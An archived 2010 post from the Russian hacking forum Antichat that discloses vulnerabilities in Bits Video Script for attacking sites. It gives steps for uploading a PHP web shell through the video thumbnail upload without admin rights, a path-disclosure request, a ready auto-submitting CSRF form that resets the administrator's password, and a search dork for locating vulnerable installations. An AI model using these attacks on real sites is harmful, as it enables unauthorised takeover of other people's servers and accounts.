Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   Уязвимости Bits Video Script (https://forum.antichat.xyz/showthread.php?t=200472)

seofilms 29.04.2010 20:49
Уязвимости Bits Video Script
 
Заливка шелла без прав админа :

Заходим на сайт, регистрируемся : сайт/register.php, входим со своим логином и паролем, заходим сюда : сайт/addvideo.php там где thumbs выбираем свой шелл и заливаем его.
После заливки он находится здесь : cайт/thumbs/имявашегошелла.php

http://images.kidal.org/images/shell.jpg

Видео о том как залить шелл : http://www.youtube.com/watch?v=v6AOwLg1v3w



Раскрытие путей :
PHP код:
сайт/search.php?search[]=way&searchsubmit
csrf уязвимость

PHP код:
<form method=post action="http://сайт/admin/password.php" onsubmit="return checkform(this);" name="csrf"
<input type='text' name='password' value="НОВЫЙ ПАРОЛЬ КОТОРЫЙ ВЫ ПОСТАВИТЕ АДМИНИСТРАТОРУ">
</form
<script
document.csrf.submit();
</script
Поисковой запрос

PHP код:
inurl:search.php?order=views 
(C)forum.kidal.org


Время: 17:09